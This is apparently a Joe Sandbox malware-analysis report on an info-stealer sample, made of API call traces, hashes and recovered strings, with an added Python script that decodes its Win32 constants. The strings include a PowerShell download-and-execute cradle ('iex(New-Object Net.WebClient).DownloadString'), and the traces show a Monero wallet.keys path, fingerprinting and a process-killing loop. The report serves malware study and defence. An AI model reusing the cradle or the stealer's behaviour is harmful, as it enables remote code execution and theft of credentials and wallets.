                                    • Opcode ID: 2ee54c2dbceb64bccf446bd8965aba1c95448f9f1955ddd5152ff9e0493fdbf4
                                    • Instruction ID: b26bdc4fb63c2d8e06b37e87efeba1f8d535452a2c68beed9f999acc64b1e11f
                                    • Opcode Fuzzy Hash: 2ee54c2dbceb64bccf446bd8965aba1c95448f9f1955ddd5152ff9e0493fdbf4
                                    • Instruction Fuzzy Hash: B15185B1944308ABEB35DB60DC9AFDE7378AB44704F004598B60DAB2C1EB75AB84CF51
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003DFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003DFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: 28f3f13c4e4d701c87b7b351e7378d546bb5287081a753b43edeada426104d6e
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 5941B232900218AFCF12DF69D880A9E7BA5BF49314F158266E81AAF391D7319911CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00365021
                                    • InternetOpenA.WININET(00380DE3,00000000,00000000,00000000,00000000), ref: 0036503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00365061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00365091
                                    • InternetCloseHandle.WININET(?), ref: 00365109
                                    • InternetCloseHandle.WININET(?), ref: 00365116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 172d3764200cdaca86a34d14e1f1799571ab4602f4dd8e88c92ab9bb8044da1c
                                    • Instruction ID: 109aa0434bb04e025dfef86f951d07893db05e6e1bc2c3fdb0bb4df402a3975b
                                    • Opcode Fuzzy Hash: 172d3764200cdaca86a34d14e1f1799571ab4602f4dd8e88c92ab9bb8044da1c
                                    • Instruction Fuzzy Hash: 8E3107F5E44218ABDB20CF54DC85BDDB7B5AB48704F1081E8FA09A7281D7B06EC58F98
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F3D9B0,00000000,?,00380E14,00000000,?,00000000), ref: 003782C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003782C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003782E8
                                    • wsprintfA.USER32 ref: 0037833C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 7a590323ab7e236d605516e4d278432d02e86db9166560d99132c751c5191aa1
                                    • Instruction ID: fbaf5761f37f4da1bc7a7334092eb030704bcf67c860d1f24243fdd5baa3cc3a
                                    • Opcode Fuzzy Hash: 7a590323ab7e236d605516e4d278432d02e86db9166560d99132c751c5191aa1
                                    • Instruction Fuzzy Hash: A2211FB1E44209ABDB21DFD4CC49FAEB7B9FB44B10F104509F619BB280D77859008BA5
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003785B6
                                    • wsprintfA.USER32 ref: 003785E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0037860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0037861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378629
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3D9F8,00000000,000F003F,?,00000400), ref: 0037867C
                                    • lstrlen.KERNEL32(?), ref: 00378691
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3D8D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00380B3C), ref: 00378729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00378798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 003787AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: bd4f53f8f0289c34ddb778801876d6e79afbcb9b40077eb9d271091c944bf26d
                                    • Instruction ID: 16774e2c691cbeb86256689c01fdbbcadd36699aef0ed422293ef1b109bb774c
                                    • Opcode Fuzzy Hash: bd4f53f8f0289c34ddb778801876d6e79afbcb9b40077eb9d271091c944bf26d
                                    • Instruction Fuzzy Hash: 342116B1A5021CABDB24DB54DC85FE9B3B9FB48700F10C1D8E609A6180DF75AA85CFE4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003799C5
                                    • Process32First.KERNEL32(0036A056,00000128), ref: 003799D9
                                    • Process32Next.KERNEL32(0036A056,00000128), ref: 003799F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00379A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00379A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00379A79
                                    • CloseHandle.KERNEL32(0036A056), ref: 00379A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: a58426ca7db41799aca6a155979b6e3ecec69640230b8f0d9b86aa1e079c4ae9
                                    • Instruction ID: 3bf3c64df6a165853571e8dd640d412c6f80202b4cc0eb4653c4ad4d76f54f8d
                                    • Opcode Fuzzy Hash: a58426ca7db41799aca6a155979b6e3ecec69640230b8f0d9b86aa1e079c4ae9
                                    • Instruction Fuzzy Hash: 0121ECB19042189BDB71DF51DC89BDDB7B9BB48304F1081C9E509A6290D7749B84CF90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0037783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B9D8,00000000,00020119,00000000), ref: 0037786D
                                    • RegQueryValueExA.ADVAPI32(00000000,00F3DAA0,00000000,00000000,?,000000FF), ref: 0037788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00377898
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f9ded46f66d1e0165510c489270604b4cc5f9e06c1d2323f3a28d56af6949ab5
                                    • Instruction ID: 48578461f4c7e9e9d39140bf2904a9e92cc14a032698bf107231d6bea62775f7
                                    • Opcode Fuzzy Hash: f9ded46f66d1e0165510c489270604b4cc5f9e06c1d2323f3a28d56af6949ab5
                                    • Instruction Fuzzy Hash: A10117B5A48305BBE710DBD4DD4AF6E7779EF48701F104094F60997290D7749A04DB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003778C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003778CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B9D8,00000000,00020119,00377849), ref: 003778EB
                                    • RegQueryValueExA.ADVAPI32(00377849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0037790A
                                    • RegCloseKey.ADVAPI32(00377849), ref: 00377914
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 1c74792c6b974a88107961555f582a6215f29b98b61b6a6e32ab8de8350f88ef
                                    • Instruction ID: 62e4594535247135c3dca09c35ef2c421b2203253955060344bf5a657a570c16
                                    • Opcode Fuzzy Hash: 1c74792c6b974a88107961555f582a6215f29b98b61b6a6e32ab8de8350f88ef
                                    • Instruction Fuzzy Hash: 2B01F4B5A44309BBEB10DBD4DC49FAE7779EB44705F104594F605A6281D774AA00CB90
                                    APIs
                                    • CreateFileA.KERNEL32(>=7,80000000,00000003,00000000,00000003,00000080,00000000,?,00373D3E,?), ref: 0037948C
                                    • GetFileSizeEx.KERNEL32(000000FF,>=7), ref: 003794A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 003794B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: >=7$>=7
                                    • API String ID: 1378416451-488991958
                                    • Opcode ID: 033e779b966fe14f60b6c1aeb90a5f813d39904ef69fe36fbbd617b2f32bc4ef
                                    • Instruction ID: 73d5c1f5c93caa942da34bf3ea8be44d5d6e0d1abfd5a1dc780e3da52c7b80ba
                                    • Opcode Fuzzy Hash: 033e779b966fe14f60b6c1aeb90a5f813d39904ef69fe36fbbd617b2f32bc4ef
                                    • Instruction Fuzzy Hash: E8F06279E04208BBDB20DFB1EC49F9E77BAAB48710F10C654FA55A72C0D67496019F80
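The API listings above (the WinINet download loop at 0036503A, the GlobalMemoryStatusEx/"%d MB" routine, the RegEnumKeyExA walk that formats "%s\%s", the Toolhelp32 process-termination loop, the two HKLM readers around CurrentBuildNumber/"Windows 11", and the CreateFileA/GetFileSizeEx check) are raw call traces, and most of their meaning sits in the hex constants. The script below is an added example, not part of the Joe Sandbox report or of the Stealc sample: it parses records in the report's "• Api.DLL(args), ref: ADDR" format, decodes the Win32 constants that appear in them (KEY_READ, KEY_WOW64_64KEY, PROCESS_TERMINATE, TH32CS_SNAPPROCESS, GENERIC_READ/OPEN_EXISTING, the WinINet cache flags) and tags each record with the capability its API set implies. The embedded records are copied from the listings above; the capability rules and tag names are ours, not Joe Sandbox's.

```python
"""Added triage helper (not Joe Sandbox or Stealc code): tag sandbox-report
API-call records and decode the Win32 constants in their arguments.
Record lines follow the report's format:  • Api.DLL(arg,arg,...), ref: ADDR
"""
import re

# Win32 / WinINet constants, values as defined in the SDK headers.
HIVES = {0x80000002: "HKEY_LOCAL_MACHINE", 0x80000001: "HKEY_CURRENT_USER"}
KEY_READ, KEY_WOW64_64KEY = 0x20019, 0x0100
PROCESS_TERMINATE, TH32CS_SNAPPROCESS = 0x0001, 0x0002
GENERIC_READ, OPEN_EXISTING = 0x80000000, 3
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD",
              0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

# Subcall lines carry a "Part of subcall function X:" prefix; args are optional.
CALL_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                     r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)")

# Capability tags (our own names): every API in the set must occur in the record.
RULES = {
    "download": {"InternetOpenUrlA", "InternetReadFile"},
    "process-kill": {"CreateToolhelp32Snapshot", "Process32Next", "TerminateProcess"},
    "registry-enum": {"RegEnumKeyExA", "RegQueryValueExA"},
    "ram-fingerprint": {"GlobalMemoryStatusEx"},
    "file-size-check": {"CreateFileA", "GetFileSizeEx"},
}
OS_MARKERS = ("CurrentBuildNumber", "Windows 11")  # literals seen in the listings


def _int(arg):
    """Hex argument -> int; '?' and symbolic arguments (a string literal) -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode(api, args):
    """Human-readable note for the constants of one call, or None."""
    a = [_int(x.strip()) for x in args.split(",")] if args else []
    if api == "RegOpenKeyExA" and len(a) >= 4 and a[0] is not None:
        sam = a[3] or 0
        rights = [n for n, bit in (("KEY_READ", KEY_READ), ("KEY_WOW64_64KEY", KEY_WOW64_64KEY))
                  if (sam & bit) == bit]
        hive = HIVES.get(a[0], f"handle {a[0]:#x}")
        return f"RegOpenKeyExA: {hive}, {'|'.join(rights) or hex(sam)}"
    if api == "OpenProcess" and a and a[0] == PROCESS_TERMINATE:
        return "OpenProcess: PROCESS_TERMINATE only (kill, not inject)"
    if api == "CreateToolhelp32Snapshot" and a and a[0] == TH32CS_SNAPPROCESS:
        return "CreateToolhelp32Snapshot: TH32CS_SNAPPROCESS"
    if api == "InternetOpenUrlA" and len(a) >= 5 and a[4] is not None:
        names = [n for bit, n in INET_FLAGS.items() if a[4] & bit]
        return "InternetOpenUrlA: " + ("|".join(names) or hex(a[4]))
    if api == "CreateFileA" and len(a) >= 5 and a[1] == GENERIC_READ and a[4] == OPEN_EXISTING:
        return "CreateFileA: GENERIC_READ, OPEN_EXISTING"
    return None


def triage(record):
    """Parse one record; return its API names, capability tags and decoded notes."""
    apis, notes = [], []
    for line in record.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        api, args = m.group(1), m.group(3) or ""
        apis.append(api)
        note = decode(api, args)
        if note:
            notes.append(note)
    found = set(apis)
    caps = [tag for tag, need in RULES.items() if need <= found]
    if any(marker in record for marker in OS_MARKERS):
        caps.append("os-fingerprint")
    return {"apis": apis, "caps": caps, "notes": notes}


# Constructed input: lines copied from the API listings of this report.
RECORDS = {
    "download": """• InternetOpenA.WININET(00380DE3,00000000,00000000,00000000,00000000), ref: 0036503A
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00365061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00365091
• InternetCloseHandle.WININET(?), ref: 00365109""",
    "kill": """• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003799C5
• Process32First.KERNEL32(0036A056,00000128), ref: 003799D9
• Process32Next.KERNEL32(0036A056,00000128), ref: 003799F2
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00379A4E
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00379A6C""",
    "regenum": """• RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003785B6
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0037860B
  • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
• RegQueryValueExA.ADVAPI32(00000000,00F3D9F8,00000000,000F003F,?,00000400), ref: 0037867C""",
    "build": """• RegOpenKeyExA.ADVAPI32(80000002,00F2B9D8,00000000,00020119,00377849), ref: 003778EB
• RegQueryValueExA.ADVAPI32(00377849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0037790A
• RegCloseKey.ADVAPI32(00377849), ref: 00377914""",
    "filesize": """• CreateFileA.KERNEL32(>=7,80000000,00000003,00000000,00000003,00000080,00000000,?,00373D3E,?), ref: 0037948C
• GetFileSizeEx.KERNEL32(000000FF,>=7), ref: 003794A9
• CloseHandle.KERNEL32(000000FF), ref: 003794B7""",
}

if __name__ == "__main__":
    for name, rec in RECORDS.items():
        r = triage(rec)
        print(f"{name:9s} caps={r['caps']}")
        for n in r["notes"]:
            print(f"{'':9s}   {n}")
```

Run as a script it prints one tag line per record plus the decoded constants. Two of those decodes are worth a second look when reading this report: the Toolhelp32 loop opens processes with PROCESS_TERMINATE (0x1) and nothing else, so that particular function kills matching processes rather than injecting into them, and the CurrentBuildNumber reader opens HKLM with KEY_READ|KEY_WOW64_64KEY (0x20119), so a 32-bit sample reads the 64-bit view of the key regardless of WOW64 redirection.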
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                    • LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c3d983159ce8fe38d05b1c4e98cad19f3479f02775de32fe25913077153a65ce
                                    • Instruction ID: 7935bf8b97eed37361d86cd2b78097cee1d2e737ee90369b1d25c764aebf4d13
                                    • Opcode Fuzzy Hash: c3d983159ce8fe38d05b1c4e98cad19f3479f02775de32fe25913077153a65ce
                                    • Instruction Fuzzy Hash: 81310BB4A00209EFDB25CFA4CC85BEE7BB5FF49300F108158E911A7294D774AA81CFA1
                                    APIs
                                    • lstrcat.KERNEL32(?,00F3DB48), ref: 00374A2B
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00374A51
                                    • lstrcat.KERNEL32(?,?), ref: 00374A70
                                    • lstrcat.KERNEL32(?,?), ref: 00374A84
                                    • lstrcat.KERNEL32(?,00F2AFA0), ref: 00374A97
                                    • lstrcat.KERNEL32(?,?), ref: 00374AAB
                                    • lstrcat.KERNEL32(?,00F3D6D8), ref: 00374ABF
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F20: GetFileAttributesA.KERNEL32(00000000,?,00361B94,?,?,0038577C,?,?,00380E22), ref: 00378F2F
                                      • Part of subcall function 003747C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003747D0
                                      • Part of subcall function 003747C0: RtlAllocateHeap.NTDLL(00000000), ref: 003747D7
                                      • Part of subcall function 003747C0: wsprintfA.USER32 ref: 003747F6
                                      • Part of subcall function 003747C0: FindFirstFileA.KERNEL32(?,?), ref: 0037480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 06c15a5e542deb1e7da22580aeb1f32b445b7bf417515968ac952d32187c5d06
                                    • Instruction ID: dbb4be9cdace12367d1951d5ad1ab0afabdb3ec62e9029ebd32cd9b95206d8b4
                                    • Opcode Fuzzy Hash: 06c15a5e542deb1e7da22580aeb1f32b445b7bf417515968ac952d32187c5d06
                                    • Instruction Fuzzy Hash: 153152F2940218A7DB35FBB0DC99EDE733DAB48700F408589B6599A051EE74A7C8CBD4
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00372FD5
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00372F54
                                    • <, xrefs: 00372F89
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00372F14
                                    • ')", xrefs: 00372F03
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 3e7cb191865e90d558998b8b73e91c6abcc892de1bd522570b94b08d46b57cca
                                    • Instruction ID: a8e98424de96ff352b340d09586479730ebc976adb0febff871ca7ee66776fbe
                                    • Opcode Fuzzy Hash: 3e7cb191865e90d558998b8b73e91c6abcc892de1bd522570b94b08d46b57cca
                                    • Instruction Fuzzy Hash: 02410171D106089ADB2AFFA0C861FDDB779AF54300F508459F00A6B191EF782A49CF51
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00F3D458,00000000,00020119,?), ref: 00374344
                                    • RegQueryValueExA.ADVAPI32(?,00F3DD88,00000000,00000000,00000000,000000FF), ref: 00374368
                                    • RegCloseKey.ADVAPI32(?), ref: 00374372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00374397
                                    • lstrcat.KERNEL32(?,00F3DB78), ref: 003743AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: a7034d8ee1faefa49087c1bcc4165330c15ffa25b12449e6b3e2c7fe28025710
                                    • Instruction ID: 0ef756fd4da838f1d5894b08f977f48347875a926703911a5db666602fb5096a
                                    • Opcode Fuzzy Hash: a7034d8ee1faefa49087c1bcc4165330c15ffa25b12449e6b3e2c7fe28025710
                                    • Instruction Fuzzy Hash: B8418FB6900108BBDB25E7A0EC56FEE733DBB48700F04C559B71A5B181EA7557888BD1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
